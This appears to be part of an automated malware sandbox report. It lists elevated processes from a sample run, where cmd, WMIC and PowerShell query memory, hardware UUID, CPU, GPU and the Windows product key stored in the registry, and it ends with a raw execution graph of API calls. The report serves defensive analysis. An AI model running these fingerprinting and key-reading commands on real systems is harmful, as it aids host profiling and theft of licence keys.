                                                                                                                                                                                                                                                    Target ID:78
                                                                                                                                                                                                                                                    Start time:23:57:30
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:79
                                                                                                                                                                                                                                                    Start time:23:57:30
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d7c90000
                                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:80
                                                                                                                                                                                                                                                    Start time:23:57:32
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:81
                                                                                                                                                                                                                                                    Start time:23:57:32
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:82
                                                                                                                                                                                                                                                    Start time:23:57:32
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d7c90000
                                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:83
                                                                                                                                                                                                                                                    Start time:23:57:33
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:84
                                                                                                                                                                                                                                                    Start time:23:57:33
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:85
                                                                                                                                                                                                                                                    Start time:23:57:33
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:86
                                                                                                                                                                                                                                                    Start time:23:57:34
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:87
                                                                                                                                                                                                                                                    Start time:23:57:34
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:88
                                                                                                                                                                                                                                                    Start time:23:57:34
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d7c90000
                                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:89
                                                                                                                                                                                                                                                    Start time:23:57:35
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:90
                                                                                                                                                                                                                                                    Start time:23:57:35
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:91
                                                                                                                                                                                                                                                    Start time:23:57:35
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:10.5%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                      Signature Coverage:20.1%
                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                      Total number of Limit Nodes:27
                                                                                                                                                                                                                                                      execution_graph 19397 7ff732075628 19398 7ff732075642 19397->19398 19399 7ff73207565f 19397->19399 19401 7ff732074ee8 _fread_nolock 11 API calls 19398->19401 19399->19398 19400 7ff732075672 CreateFileW 19399->19400 19403 7ff7320756dc 19400->19403 19404 7ff7320756a6 19400->19404 19402 7ff732075647 19401->19402 19405 7ff732074f08 _get_daylight 11 API calls 19402->19405 19448 7ff732075c04 19403->19448 19422 7ff73207577c GetFileType 19404->19422 19408 7ff73207564f 19405->19408 19411 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19408->19411 19418 7ff73207565a 19411->19418 19412 7ff7320756bb CloseHandle 19412->19418 19413 7ff7320756d1 CloseHandle 19413->19418 19414 7ff7320756e5 19416 7ff732074e7c _fread_nolock 11 API calls 19414->19416 19415 7ff732075710 19469 7ff7320759c4 19415->19469 19421 7ff7320756ef 19416->19421 19421->19418 19423 7ff7320757ca 19422->19423 19424 7ff732075887 19422->19424 19425 7ff7320757f6 GetFileInformationByHandle 19423->19425 19429 7ff732075b00 21 API calls 19423->19429 19426 7ff7320758b1 19424->19426 19427 7ff73207588f 19424->19427 19430 7ff7320758a2 GetLastError 19425->19430 19431 7ff73207581f 19425->19431 19428 7ff7320758d4 PeekNamedPipe 19426->19428 19447 7ff732075872 19426->19447 19427->19430 19432 7ff732075893 19427->19432 19428->19447 19434 7ff7320757e4 19429->19434 19433 7ff732074e7c _fread_nolock 11 API calls 19430->19433 19435 7ff7320759c4 51 API calls 19431->19435 19436 7ff732074f08 _get_daylight 11 API calls 19432->19436 19433->19447 19434->19425 19434->19447 19438 7ff73207582a 19435->19438 19436->19447 19437 7ff73206c550 _log10_special 8 API calls 19440 7ff7320756b4 19437->19440 19486 7ff732075924 19438->19486 19440->19412 19440->19413 19442 7ff732075924 10 API calls 19443 7ff732075849 19442->19443 19444 7ff732075924 10 API calls 19443->19444 19445 7ff73207585a 19444->19445 19446 7ff732074f08 _get_daylight 11 API calls 19445->19446 19445->19447 19446->19447 19447->19437 19449 7ff732075c3a 19448->19449 19450 7ff732075cd2 __std_exception_destroy 19449->19450 19451 7ff732074f08 _get_daylight 11 API calls 19449->19451 19452 7ff73206c550 _log10_special 8 API calls 19450->19452 19453 7ff732075c4c 19451->19453 19454 7ff7320756e1 19452->19454 19455 7ff732074f08 _get_daylight 11 API calls 19453->19455 19454->19414 19454->19415 19456 7ff732075c54 19455->19456 19457 7ff732077e08 45 API calls 19456->19457 19458 7ff732075c69 19457->19458 19459 7ff732075c7b 19458->19459 19460 7ff732075c71 19458->19460 19462 7ff732074f08 _get_daylight 11 API calls 19459->19462 19461 7ff732074f08 _get_daylight 11 API calls 19460->19461 19468 7ff732075c76 19461->19468 19463 7ff732075c80 19462->19463 19463->19450 19464 7ff732074f08 _get_daylight 11 API calls 19463->19464 19465 7ff732075c8a 19464->19465 19466 7ff732077e08 45 API calls 19465->19466 19466->19468 19467 7ff732075cc4 GetDriveTypeW 19467->19450 19468->19450 19468->19467 19471 7ff7320759ec 19469->19471 19470 7ff73207571d 19479 7ff732075b00 19470->19479 19471->19470 19493 7ff73207f724 19471->19493 19473 7ff732075a80 19473->19470 19474 7ff73207f724 51 API calls 19473->19474 19475 7ff732075a93 19474->19475 19475->19470 19476 7ff73207f724 51 API calls 19475->19476 19477 7ff732075aa6 19476->19477 19477->19470 19478 7ff73207f724 51 API calls 19477->19478 19478->19470 19480 7ff732075b1a 19479->19480 19481 7ff732075b51 19480->19481 19482 7ff732075b2a 19480->19482 19483 7ff73207f5b8 21 API calls 19481->19483 19484 7ff732075b3a 19482->19484 19485 7ff732074e7c _fread_nolock 11 API calls 19482->19485 19483->19484 19484->19421 19485->19484 19487 7ff73207594d FileTimeToSystemTime 19486->19487 19488 7ff732075940 19486->19488 19489 7ff732075948 19487->19489 19490 7ff732075961 SystemTimeToTzSpecificLocalTime 19487->19490 19488->19487 19488->19489 19491 7ff73206c550 _log10_special 8 API calls 19489->19491 19490->19489 19492 7ff732075839 19491->19492 19492->19442 19494 7ff73207f755 19493->19494 19495 7ff73207f731 19493->19495 19497 7ff73207f78f 19494->19497 19500 7ff73207f7ae 19494->19500 19495->19494 19496 7ff73207f736 19495->19496 19498 7ff732074f08 _get_daylight 11 API calls 19496->19498 19499 7ff732074f08 _get_daylight 11 API calls 19497->19499 19501 7ff73207f73b 19498->19501 19502 7ff73207f794 19499->19502 19503 7ff732074f4c 45 API calls 19500->19503 19504 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19501->19504 19505 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19502->19505 19509 7ff73207f7bb 19503->19509 19506 7ff73207f746 19504->19506 19508 7ff73207f79f 19505->19508 19506->19473 19507 7ff7320804dc 51 API calls 19507->19509 19508->19473 19509->19507 19509->19508 20464 7ff7320816b0 20475 7ff7320873e4 20464->20475 20476 7ff7320873f1 20475->20476 20477 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20476->20477 20478 7ff73208740d 20476->20478 20477->20476 20479 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20478->20479 20480 7ff7320816b9 20478->20480 20479->20478 20481 7ff7320802d8 EnterCriticalSection 20480->20481 19577 7ff73207c520 19588 7ff7320802d8 EnterCriticalSection 19577->19588 18759 7ff7320808c8 18760 7ff7320808ec 18759->18760 18763 7ff7320808fc 18759->18763 18761 7ff732074f08 _get_daylight 11 API calls 18760->18761 18784 7ff7320808f1 18761->18784 18762 7ff732080bdc 18765 7ff732074f08 _get_daylight 11 API calls 18762->18765 18763->18762 18764 7ff73208091e 18763->18764 18766 7ff73208093f 18764->18766 18890 7ff732080f84 18764->18890 18767 7ff732080be1 18765->18767 18770 7ff7320809b1 18766->18770 18771 7ff732080965 18766->18771 18776 7ff7320809a5 18766->18776 18769 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18767->18769 18769->18784 18773 7ff73207eb98 _get_daylight 11 API calls 18770->18773 18788 7ff732080974 18770->18788 18905 7ff7320796c0 18771->18905 18772 7ff732080a5e 18783 7ff732080a7b 18772->18783 18789 7ff732080acd 18772->18789 18777 7ff7320809c7 18773->18777 18776->18772 18776->18788 18911 7ff73208712c 18776->18911 18780 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18777->18780 18779 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18779->18784 18785 7ff7320809d5 18780->18785 18781 7ff73208098d 18781->18776 18791 7ff732080f84 45 API calls 18781->18791 18782 7ff73208096f 18786 7ff732074f08 _get_daylight 11 API calls 18782->18786 18787 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18783->18787 18785->18776 18785->18788 18793 7ff73207eb98 _get_daylight 11 API calls 18785->18793 18786->18788 18790 7ff732080a84 18787->18790 18788->18779 18789->18788 18792 7ff7320833dc 40 API calls 18789->18792 18798 7ff732080a89 18790->18798 18947 7ff7320833dc 18790->18947 18791->18776 18794 7ff732080b0a 18792->18794 18795 7ff7320809f7 18793->18795 18796 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18794->18796 18801 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18795->18801 18802 7ff732080b14 18796->18802 18799 7ff732080bd0 18798->18799 18805 7ff73207eb98 _get_daylight 11 API calls 18798->18805 18804 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18799->18804 18800 7ff732080ab5 18803 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18800->18803 18801->18776 18802->18788 18802->18798 18803->18798 18804->18784 18806 7ff732080b58 18805->18806 18807 7ff732080b69 18806->18807 18808 7ff732080b60 18806->18808 18810 7ff73207a4a4 __std_exception_copy 37 API calls 18807->18810 18809 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18808->18809 18811 7ff732080b67 18809->18811 18812 7ff732080b78 18810->18812 18816 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18811->18816 18813 7ff732080c0b 18812->18813 18814 7ff732080b80 18812->18814 18815 7ff73207a900 _isindst 17 API calls 18813->18815 18956 7ff732087244 18814->18956 18818 7ff732080c1f 18815->18818 18816->18784 18820 7ff732080c48 18818->18820 18830 7ff732080c58 18818->18830 18823 7ff732074f08 _get_daylight 11 API calls 18820->18823 18821 7ff732080bc8 18824 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18821->18824 18822 7ff732080ba7 18825 7ff732074f08 _get_daylight 11 API calls 18822->18825 18827 7ff732080c4d 18823->18827 18824->18799 18826 7ff732080bac 18825->18826 18828 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18826->18828 18828->18811 18829 7ff732080f3b 18832 7ff732074f08 _get_daylight 11 API calls 18829->18832 18830->18829 18831 7ff732080c7a 18830->18831 18833 7ff732080c97 18831->18833 18975 7ff73208106c 18831->18975 18834 7ff732080f40 18832->18834 18837 7ff732080cbf 18833->18837 18839 7ff732080d0b 18833->18839 18857 7ff732080cff 18833->18857 18836 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18834->18836 18836->18827 18990 7ff7320796fc 18837->18990 18840 7ff732080d33 18839->18840 18843 7ff732080cce 18839->18843 18844 7ff73207eb98 _get_daylight 11 API calls 18839->18844 18840->18843 18846 7ff73207eb98 _get_daylight 11 API calls 18840->18846 18840->18857 18842 7ff732080dbe 18852 7ff732080ddb 18842->18852 18858 7ff732080e2e 18842->18858 18847 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18843->18847 18848 7ff732080d25 18844->18848 18851 7ff732080d55 18846->18851 18847->18827 18853 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18848->18853 18849 7ff732080cc9 18854 7ff732074f08 _get_daylight 11 API calls 18849->18854 18850 7ff732080ce7 18850->18857 18860 7ff73208106c 45 API calls 18850->18860 18855 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18851->18855 18856 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18852->18856 18853->18840 18854->18843 18855->18857 18859 7ff732080de4 18856->18859 18857->18842 18857->18843 18996 7ff732086fec 18857->18996 18858->18843 18861 7ff7320833dc 40 API calls 18858->18861 18863 7ff7320833dc 40 API calls 18859->18863 18866 7ff732080dea 18859->18866 18860->18857 18862 7ff732080e6c 18861->18862 18864 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18862->18864 18865 7ff732080e16 18863->18865 18868 7ff732080e76 18864->18868 18869 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18865->18869 18867 7ff732080f2f 18866->18867 18871 7ff73207eb98 _get_daylight 11 API calls 18866->18871 18870 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18867->18870 18868->18843 18868->18866 18869->18866 18870->18827 18872 7ff732080ebb 18871->18872 18873 7ff732080ecc 18872->18873 18874 7ff732080ec3 18872->18874 18876 7ff732080474 37 API calls 18873->18876 18875 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18874->18875 18877 7ff732080eca 18875->18877 18878 7ff732080eda 18876->18878 18882 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18877->18882 18879 7ff732080ee2 SetEnvironmentVariableW 18878->18879 18880 7ff732080f6f 18878->18880 18883 7ff732080f27 18879->18883 18884 7ff732080f06 18879->18884 18881 7ff73207a900 _isindst 17 API calls 18880->18881 18885 7ff732080f83 18881->18885 18882->18827 18886 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18883->18886 18887 7ff732074f08 _get_daylight 11 API calls 18884->18887 18886->18867 18888 7ff732080f0b 18887->18888 18889 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18888->18889 18889->18877 18891 7ff732080fb9 18890->18891 18892 7ff732080fa1 18890->18892 18893 7ff73207eb98 _get_daylight 11 API calls 18891->18893 18892->18766 18900 7ff732080fdd 18893->18900 18894 7ff732081062 18895 7ff73207a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18894->18895 18897 7ff732081068 18895->18897 18896 7ff73208103e 18898 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18896->18898 18898->18892 18899 7ff73207eb98 _get_daylight 11 API calls 18899->18900 18900->18894 18900->18896 18900->18899 18901 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18900->18901 18902 7ff73207a4a4 __std_exception_copy 37 API calls 18900->18902 18903 7ff73208104d 18900->18903 18901->18900 18902->18900 18904 7ff73207a900 _isindst 17 API calls 18903->18904 18904->18894 18906 7ff7320796d9 18905->18906 18907 7ff7320796d0 18905->18907 18906->18781 18906->18782 18907->18906 19020 7ff732079198 18907->19020 18912 7ff732087139 18911->18912 18913 7ff732086254 18911->18913 18915 7ff732074f4c 45 API calls 18912->18915 18914 7ff732086261 18913->18914 18920 7ff732086297 18913->18920 18917 7ff732074f08 _get_daylight 11 API calls 18914->18917 18927 7ff732086208 18914->18927 18921 7ff73208716d 18915->18921 18916 7ff7320862c1 18918 7ff732074f08 _get_daylight 11 API calls 18916->18918 18919 7ff73208626b 18917->18919 18923 7ff7320862c6 18918->18923 18924 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 18919->18924 18920->18916 18926 7ff7320862e6 18920->18926 18922 7ff732087183 18921->18922 18925 7ff732087172 18921->18925 18928 7ff73208719a 18921->18928 18929 7ff732074f08 _get_daylight 11 API calls 18922->18929 18930 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 18923->18930 18931 7ff732086276 18924->18931 18925->18776 18932 7ff732074f4c 45 API calls 18926->18932 18937 7ff7320862d1 18926->18937 18927->18776 18934 7ff7320871b6 18928->18934 18935 7ff7320871a4 18928->18935 18933 7ff732087188 18929->18933 18930->18937 18931->18776 18932->18937 18940 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 18933->18940 18938 7ff7320871de 18934->18938 18939 7ff7320871c7 18934->18939 18936 7ff732074f08 _get_daylight 11 API calls 18935->18936 18941 7ff7320871a9 18936->18941 18937->18776 19262 7ff732088f4c 18938->19262 19253 7ff7320862a4 18939->19253 18940->18925 18944 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 18941->18944 18944->18925 18946 7ff732074f08 _get_daylight 11 API calls 18946->18925 18948 7ff7320833fe 18947->18948 18949 7ff73208341b 18947->18949 18948->18949 18950 7ff73208340c 18948->18950 18951 7ff732083425 18949->18951 19302 7ff732087c38 18949->19302 18952 7ff732074f08 _get_daylight 11 API calls 18950->18952 19309 7ff732087c74 18951->19309 18955 7ff732083411 __scrt_get_show_window_mode 18952->18955 18955->18800 18957 7ff732074f4c 45 API calls 18956->18957 18958 7ff7320872aa 18957->18958 18959 7ff7320872b8 18958->18959 19321 7ff73207ef24 18958->19321 19324 7ff7320754ac 18959->19324 18963 7ff7320873a4 18965 7ff7320873b5 18963->18965 18966 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18963->18966 18964 7ff732074f4c 45 API calls 18968 7ff732087327 18964->18968 18967 7ff732080ba3 18965->18967 18970 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18965->18970 18966->18965 18967->18821 18967->18822 18969 7ff73207ef24 5 API calls 18968->18969 18971 7ff732087330 18968->18971 18969->18971 18970->18967 18972 7ff7320754ac 14 API calls 18971->18972 18973 7ff73208738b 18972->18973 18973->18963 18974 7ff732087393 SetEnvironmentVariableW 18973->18974 18974->18963 18976 7ff7320810ac 18975->18976 18977 7ff73208108f 18975->18977 18978 7ff73207eb98 _get_daylight 11 API calls 18976->18978 18977->18833 18984 7ff7320810d0 18978->18984 18979 7ff732081131 18981 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18979->18981 18980 7ff73207a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18982 7ff73208115a 18980->18982 18981->18977 18983 7ff73207eb98 _get_daylight 11 API calls 18983->18984 18984->18979 18984->18983 18985 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18984->18985 18986 7ff732080474 37 API calls 18984->18986 18987 7ff732081140 18984->18987 18989 7ff732081154 18984->18989 18985->18984 18986->18984 18988 7ff73207a900 _isindst 17 API calls 18987->18988 18988->18989 18989->18980 18991 7ff73207970c 18990->18991 18992 7ff732079715 18990->18992 18991->18992 19346 7ff73207920c 18991->19346 18992->18849 18992->18850 18997 7ff732086ff9 18996->18997 19001 7ff732087026 18996->19001 18998 7ff732086ffe 18997->18998 18997->19001 18999 7ff732074f08 _get_daylight 11 API calls 18998->18999 19002 7ff732087003 18999->19002 19000 7ff73208706a 19003 7ff732074f08 _get_daylight 11 API calls 19000->19003 19001->19000 19004 7ff732087089 19001->19004 19018 7ff73208705e __crtLCMapStringW 19001->19018 19005 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19002->19005 19006 7ff73208706f 19003->19006 19007 7ff7320870a5 19004->19007 19008 7ff732087093 19004->19008 19009 7ff73208700e 19005->19009 19011 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19006->19011 19010 7ff732074f4c 45 API calls 19007->19010 19012 7ff732074f08 _get_daylight 11 API calls 19008->19012 19009->18857 19013 7ff7320870b2 19010->19013 19011->19018 19014 7ff732087098 19012->19014 19013->19018 19393 7ff732088b08 19013->19393 